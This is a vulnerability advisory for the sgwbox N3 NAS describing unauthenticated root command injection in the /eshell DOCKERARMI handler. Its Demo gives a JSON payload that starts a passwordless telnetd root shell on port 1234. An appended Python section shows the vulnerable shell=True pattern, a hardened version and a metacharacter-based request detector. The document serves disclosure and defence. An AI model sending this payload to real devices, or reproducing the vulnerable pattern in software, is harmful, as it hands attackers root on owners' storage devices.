Information

Vendor: sgwbox

Affected products: N3 NAS ≤ V2.0.25

Vendor Homepage: https://mall.sgwbox.com/

Vendor contact information: mailto:box@new1cloud.com


Description

A vulnerability in the sgwbox N3 NAS allows unauthenticated remote command execution. The DOCKERARMI command handler of the /eshell interface does not filter shell metacharacters from its parameters, so user input is interpreted by the shell and arbitrary commands can be injected. An unauthenticated attacker sends a crafted JSON POST request to this Docker-related command interface and obtains root control of the target NAS.

Details

As can be seen from /usr/sbin/http_eshell_server, the DOCKERARMI command interface performs neither authentication nor input validation: the first element of the received params array is concatenated directly into the command line that is handed to the shell for execution.


An unauthenticated command injection therefore exists at this point. An attacker who exploits it gains root, the highest privilege level, on the remote NAS.

Demo

Without authentication, the attacker sends a JSON-formatted POST request to the /eshell API without any token. For the DOCKERARMI command, the malicious command is injected into the first element of params:

{
  "params": [
    "$(telnetd -l /bin/sh -p 1234)"
  ],
  "cmd": "DOCKERARMI"
}


This starts a telnetd on port 1234 that serves /bin/sh directly in place of the login program, so connecting to that port without any password yields a root shell on the remote NAS.
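As an added illustration (not code from this advisory, from NASchecker, or from the vendor's http_eshell_server binary), the following Python reproduces the concatenation pattern described under Details with a harmless stand-in command, places the hardened form next to it (argument allowlist plus argv-style execution with no shell in between), and flags /eshell request bodies of the kind shown in the Demo. The stand-in base command `echo dockerarmi`, the allowlist pattern and every sample body except the advisory's own payload are assumptions; the telnetd payload is only scanned, never executed, and `$(echo INJECTED)` stands in for it when the vulnerable dispatcher is run.

```python
"""
Constructed demonstration of the DOCKERARMI injection class and a fix.
Assumptions: the real handler's base command is unknown, so 'echo dockerarmi'
stands in for it; the allowlist below is what a container/image name argument
would typically need, not the vendor's format.
"""
import json
import re
import subprocess

# Constructed sample /eshell request bodies. The first is the payload from the
# advisory; the remaining three are assumed benign or borderline traffic.
SAMPLE_BODIES = [
    '{"params": ["$(telnetd -l /bin/sh -p 1234)"], "cmd": "DOCKERARMI"}',
    '{"params": ["nginx:latest"], "cmd": "DOCKERARMI"}',
    '{"params": ["foo; id"], "cmd": "DOCKERARMI"}',
    '{"params": ["`id`"], "cmd": "OTHERCMD"}',
]

# Characters that let a parameter escape a shell word or start a substitution.
SHELL_META = set(";&|`$<>(){}\\\"'\n")

# Assumed allowlist for a docker container/image name argument.
SAFE_PARAM = re.compile(r"[A-Za-z0-9][A-Za-z0-9_.:/-]{0,127}")


def flag_request(body: str) -> bool:
    """True when a /eshell JSON body carries shell metacharacters in params.

    Every cmd is checked, not only DOCKERARMI, on the assumption that other
    handlers in the same binary may share the concatenation pattern.
    """
    try:
        msg = json.loads(body)
    except ValueError:
        return False
    params = msg.get("params")
    if not isinstance(params, list):
        return False
    return any(isinstance(p, str) and any(c in SHELL_META for c in p)
               for p in params)


def scan_bodies(bodies=SAMPLE_BODIES):
    """Return the sample bodies that look like injection attempts."""
    return [b for b in bodies if flag_request(b)]


def vulnerable_dispatch(param: str) -> str:
    """The pattern described in Details: input pasted into a shell command."""
    cmdline = "echo dockerarmi " + param          # no filtering, shell parses it
    out = subprocess.run(cmdline, shell=True, capture_output=True, text=True)
    return out.stdout.strip()


def is_accepted(param: str) -> bool:
    """Allowlist check applied before any execution."""
    return SAFE_PARAM.fullmatch(param) is not None


def hardened_dispatch(param: str) -> str:
    """Same operation with the allowlist check and no shell in between."""
    if not is_accepted(param):
        raise ValueError("rejected parameter: %r" % param)
    out = subprocess.run(["echo", "dockerarmi", param],   # argv, no /bin/sh
                         capture_output=True, text=True)
    return out.stdout.strip()


if __name__ == "__main__":
    for body in scan_bodies():
        print("suspicious:", body)
    # The $(...) substitution is executed by the shell in the vulnerable form.
    print("vulnerable:", vulnerable_dispatch("$(echo INJECTED)"))
    try:
        hardened_dispatch("$(echo INJECTED)")
    except ValueError as err:
        print("hardened:", err)
    print("hardened:", hardened_dispatch("nginx:latest"))
```

The allowlist is the important half of the fix: passing an argv array removes the shell, but a handler that forwards the parameter to another program (docker itself, for instance) still has to reject anything that program would interpret as an option or a path, so accept a narrow character set rather than trying to blacklist metacharacters. The detection function is the kind of check a reverse proxy or IDS rule in front of /eshell would apply; it does not replace adding authentication to the handler.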


Credit

NASchecker